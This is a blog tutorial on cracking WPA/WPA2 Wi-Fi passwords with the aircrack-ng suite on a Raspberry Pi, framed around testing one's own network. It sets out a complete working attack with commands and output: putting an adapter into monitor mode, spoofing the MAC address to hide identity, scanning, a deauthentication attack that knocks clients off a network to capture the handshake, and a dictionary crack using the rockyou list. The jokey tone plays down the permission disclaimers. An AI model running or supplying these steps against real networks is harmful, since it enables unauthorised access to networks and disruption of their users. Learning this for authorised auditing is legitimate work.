Aircrack WPA/WPA2 Wi-Fi Passwords

This tutorial is intended for you to test YOUR OWN NETWORK INFRASTRUCTURE AND HARDWARE OR NETWORK INFRASTRUCTURE and hardware you have specific permission to audit1. I am not a lawyer, I am not your lawyer and you really shouldn’t do anything stupid or bad with the information contained in this post.

If you’re just learning to hack, follow this simple principle: do not hack things without permission2:

What you should do is learn this stuff and make your networks, and any network you are responsible for, that much more difficult to pop.

Text Video or Pictures

Depending on what type of learning you prefer it might be easier for you to watch a video of this process, that video is at the end of this post.

Assumptions

This post assumes you have a Raspberry Pi 3B+ (RPi) running the operating system Raspbian Stretch Lite. It’s important to use the light version as it doesn’t contain anything you don’t need. Anything you do need you can install.

You will also need a Wi-Fi adapter that you can put into Monitor Mode, on this version of the RPi it is possible to do that but I would definitely recommend splashing out the 20 to 30 quid on an Alfa USB Wi-Fi radio. I’ve tried loads of them but I always end up coming back to the Alfa AWUS036NHA USB Wi-Fi radio.

Install The Necessary Software

First need to install the software we are going to need to Hack all the packets! The software packages we are going to install our:

  • wget & curl For grabbing things from the Internet
  • iw For monkeying with network connections
  • aircrack-ng For grabbing handshakes and attempting to guess the password
  • macchanger To give us a random MAC address

Install wget

sudo apt install wget and curl

Install iw

sudo apt install iw

Install Aircrack Suite

sudo apt install aircrack-ng

Install macchanger

sudo apt install macchanger

Hunt the Radio!

On the RPi the interface named wlan03 tends to be the Wi-Fi radio on the RPi itself and whilst it’s possible to use the on-board Wi-Fi in Monitor Mode, you will have much better results (with range and signal strength etc) with the USB Wi-Fi radio. That being said it’s time to find whether the RPi recognises your USB Wi-Fi radio.

Find Your USB Radio

To find out if your radio is connected run the following command in your Terminal:

lsusb

Which will hopefully output something in the terminal that looks like this:

Bus 001 Device 004: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter

If you’re not sure which USB Device is your Wi-Fi radio is which, unplug your USB radio and run the command again. You should be able to see what’s missing.

Is It Can Be Wireless?

We need to check whether your USB radio can be used in a Usefully Wireless Way™. Run the command below to find out:

Test USB Antenna Usefulness

iwconfig

The results of this command should contain something like the following (if they do you are onto a winner):

lsusb Command Output

wlan1     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Time Spent On Reconnaissance Is Seldom Wasted

airmon-ng is part of the aircrack-ng suite of tools, which we’re going to use to place our wireless interface into the right modes. Let’s see which wireless interfaces airmon-ng is aware of, and can therefore use, by running:

Check Useful Wi-Fi Interfaces

airmon-ng

Which should give you the following output. The one we are going to be acting upon is called: wlan1.

Airmon-ng Output

PHY Interface   Driver      Chipset

phy0    wlan0       brcmfmac    Broadcom 43430
phy1    wlan1       rt2800usb   Ralink Technology, Corp. RT2870/RT3070

Monitor Mode

For the software to do the things that it does, the antenna needs to be put in a state known as Monitor Mode. We do this by simply issuing the following command: (The command may vary slightly if your Wi-Fi adapter has a different name.)

Put wlan1into Monitor Mode

airmon-ng start wlan1

This is a pretty typical output from the command above. As you can see a new Monitor Mode network interface has been created called: wlan1mon. Without putting your radio into Monitor Mode, nothing that follows will work.

Airmon-ng start wlan1 Output

PHY Interface   Driver      Chipset

phy0    wlan0       brcmfmac    Broadcom 43430
phy1    wlan1       rt2800usb   Ralink Technology, Corp. RT2870/RT3070

        (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
        (mac80211 station mode vif disabled for [phy1]wlan1)

Sneaky Beaky

Now, I know that you’ve got full permission to go after this particular access point so you might wonder why you need to mask your computers identity by changing the mac address. Well, you don’t. But if you intend to start a career in penetration testing, then developing the habit of routinely masking your computers identity and not leaking any personally identifiable information will serve you well. Changing your MAC address is a very basic step that you can take. You can change the MAC address of your computer with macchanger.

Take Down Monitor Mode Interface Temporarily

ifconfig wlan1mon down

Temporarily change your MAC Address

macchanger -p wlan1mon

Will output following command, do not be tempted to set a random MAC address permanently. The reason we are changing the MAC address is to get rid of any permanent identifiers. Get into the habit of doing this each time you run the process.4

macchanger Output

Current MAC:   00:25:22:XX:XX:XX (ASRock Incorporation)
Permanent MAC: 00:25:22:XX:XX:XX(ASRock Incorporation)
New MAC:       00:11:22:XX:XX:XX (CIMSYS Inc)

This brings the Monitor Mode Wi-Fi interface back up so that we can use it for the rest of the tutorial:

Bring Monitor Mode Interface Back Up

ifconfig wlan1mon up

Let’s Get Scanning

Now we get to the good part. Here is a video of the process from installing the software to beginning the scanning process. I would recommend reading the text instructions as well but lots of people find these videos useful:

Airmon-ng & Airodump-ng

Use the following command to do a survey of all of the Wi-Fi access points and clients that are within range of your machine:

NOTE: your monitoring interface may be called something other than wlan1mon. Replace the name of your interface in the commands below where necessary.

Initial Airodump-ng Scan

airodump-ng wlan1mon

You will get output looking like this. I have again redacted some of the information to protect the guilty:

Airodump-ng Scan Output

CH  8 ][ Elapsed: 18 s ][ 2019-03-28 22:16 ][ sorting by beacon number

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

2C:FD:A1:XX:XX:XX -45       13      132   14   9   54  WPA2 CCMP   PSK  Pretty Fly for a Wi-Fi
B8:27:EB::XX:XX:XX  -38       13       43    0   7   54  WPA2 CCMP   PSK  PiFi

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

2C:FD:A1:XX:XX:XX  40:B4:CD:XX:XX:XX  -36    0e-24e     8       58
is acutely
2C:FD:A1:XX:XX:XX  D0:73:D5:XX:XX:XX  -62    1 -11      0        2
B8:27:EB:XX:XX:XX  00:C0:CA:XX:XX:XX  -28    0 -48      0       22
B8:27:EB:XX:XX:XX  F0:18:98:XX:XX:XX  -70    0 - 5      0

Pick On A Target

Okay, now we need to choose a victim (Or you know, legally allowed client. In this instance it will be my access point called PiFi, and the name of the game is to capture the 4-Way Handshake. This is a cryptographic artefact which is generated each time a device associates with a wireless access point. When your mobile phone or laptop connects to your home Wi-Fi it exchanges information with your Wi-Fi routers and one of those pieces of information is the 4-Way Handshake. Amongst other things, the 4 Way Handshake contains the Wi-Fi password for that access point. It is in a hashed state, but once we have grabbed it out of the ether we can go about cracking it.

When thinking about target selection you are always going to be much better off choosing a wireless access point that has one or more clients connected to it. While technically you could just leave the command running and waiting for somebody to connect your access point of choice, it’s much quicker to choose one has somebody to bump off the network.

TL,DR: We will be running a deauthentication attack.

Picking on the Access Point

airodump-ng -c 7 -w PiFi -b B8:27:EB:XX:XX:XX wlan1mon

Command Breakdown:

airodump-ng = Software to monitor Access Points
-c 7 = The channel of our chosen victim
-w PiFi = The ESSID (name) of our access point
-b B8:27:EB:XX:XX:XX = The BSSID (MAC address) of our access point
wlan1mon = The name of our Monitor Mode interface

You can see that the airodump-ng command we just issued is very similar to the first we did, except it is exclusively focusing on one access point. Your Mac addresses and access point name will be different, but your output will look like this:

Specific Access Point airodump-ng Output

CH  7 ][ Elapsed: 18 s ][ 2019-03-29 10:48 ]

BSSID   PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

B8:27:EB:XX:XX:XX  -34 100  186    91   16   7   54  WPA2 CCMP   PSK  PiFi

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

B8:27:EB:XX:XX:XX  00:C0:CA:XX:XX:XX  -24    0 -48      0        1
B8:27:EB:XX:XX:XX  F0:18:98:XX:XX:XX  -58   36 -24     83       88

Bump Them Off!

This is very important: you must leave that running and open up a new terminal for the next command. The purpose of this command is to pick on one of the clients connected to PiFi and try and bump them off the network. When they try to reconnect they will be successful, but during the process we can swipe one of the 4-Way Handshakes they exchange with the access point without them knowing! Mwahaha!

Kick Them Off The Access Point

aireplay-ng -0 50 -e PiFi -a B8:27:EB:XX:XX:XX -c 00:1d:d9:XX:XX:XX wlan1mon

Command Breakdown: aireplay-ng = Software needed for a deauthentication attack
-0 50 = -0 Indicates we want to carry out a deauthentication attack. 50 is a whole number denoting how many packets we should send. YMMV with how many you would need to achieve the job, I generally use 50 with a fair degree of success.
-e PiFi = The ESSID (name) of our access point
-a B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the ACCESS POINT
-c B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the CLIENT we want to knock off the access point
wlan1mon = The name of our Monitor Mode interface

Aireplay-ng

Success?!

Now, if you look back in the first terminal window that is monitoring the access point you should see a change if you are successful. In the top right hand corner of the screen you should see the message [ WPA handshake: B8:27:EB:XX:XX:XX with the MAC address of the access point being shown. This means you now have a file containing a hashed version of the password needed to authenticate with the Wi-Fi access point.

It will probably look something like this:

WPA 4-Way Handshake Captured

CH  7 ][ Elapsed: 18 s ][ 2019-03-29 10:48 ][ WPA handshake: B8:27:EB:XX:XX:XX

BSSID   PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

2C:FD:A1:XX:XX:XX  -24   0        0        1    0   9   54  WPA2 CCMP   PSK  The Night's Switch.
B8:27:EB:XX:XX:XX  -34 100      186       91   16   7   54  WPA2 CCMP   PSK  PiFi

BSSID              STATION            PWR   Rate    Lost    Frames  Probe


B8:27:EB:XX:XX:XX  00:C0:CA:XX:XX:XX  -24    0 -48      0        1
B8:27:EB:XX:XX:XX  F0:18:98:XX:XX:XX  -58   36 -24     83       88

The Hard Part

All of this has been leading up to us cracking the hashed password and revealing the plaintext version so that we can authenticate with the access point, there are a number of ways to do that but the most accessible is to use a Dictionary Attack and a piece of software called Aircrack-ng. I will post more about this topic in the future as it totally fascinates me.

For now, here’s a quick example of using the tool to try and crack the password.

The Dictionary

We use a dictionary attack which takes a huge list of passwords, hashes them using the same algorithm ashore Wi-Fi access point, and then compares them to the hash we have captured in our forward handshake. If it finds a match then you are successful, however if the password you have captured in the 4-Way Handshake is not contained in the dictionary then you will be out of luck. These dictionary attacks also take a very long time, and the more you do it the better your dictionaries will get but this is by no means a full proof way of getting the password. You are relying upon people’s habit of not using good passwords.

The RockYou List

The rockyou.txt password list is one of the standard dictionary lists of password that appeared out of the mists of time, from who knows when and who knows where… To get your copy of this holy talisman use the following command:

Rock My World

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Cracking the Hashed Password

aircrack-ng -w rockyou.txt -b B8:27:EB:XX:XX:XX PiFi-01.cap

Command Breakdown: aircrack-ng = Software needed to try cracking a password
-w rockyou.txt = This command points of the word list called rockyou.txt
-b B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the ACCESS POINT
PiFi-01.cap = The file we captured early containing the 4-Way Handshake

If you managed to capture a hashed password, running the command above will have the following output. Note a gigantic amount of time this takes, obviously more powerful CPU generally equals shorter cracking time. But it doesn’t matter how fast your computer is, if the password is not in your dictionary then you will not crack it.

Aircrack-ng

aircrack-ng Output

                              Aircrack-ng 1.5.2

      [00:00:09] 1484/9822769 keys tested (168.84 k/s)

      Time left: 16 hours, 14 minutes, 20 seconds                0.02%

                       Current passphrase: addicted


      Master Key     : 90 DC DF 8F BA AD 8A 78 88 23 19 51 F0 BC 46 B7
                       A1 78 2D 0D 5F 4C 2E FE 72 DE BF F3 43 E8 4E A1

      Transient Key  : D9 78 50 9E FF 4E FE C4 7D 47 10 B9 43 22 6E 10
                       28 32 4B 37 DF A2 61 85 9A E9 F1 5B 28 62 E3 4A
                       5D 61 01 9C CE 39 C7 96 AC 1B B2 47 73 24 D0 9A
                       6D BB 55 A8 B5 B2 3B 11 7D 99 27 14 1B B1 84 ED

      EAPOL HMAC     : C4 91 54 B6 AB 05 CF E7 D8 DF 90 C1 6E 43 56 EC

  1. Yes yes, by audit I obviously mean hack! 

  2. Permission from the owner of the hardware, not your mum! (Unless she owns a hardware, natch) 

  3. There are some reasons this might not be the case, but you will probably be fine and that is out of scope. 

  4. Obviously have changed my personal MAC address to protect the totally not guilty.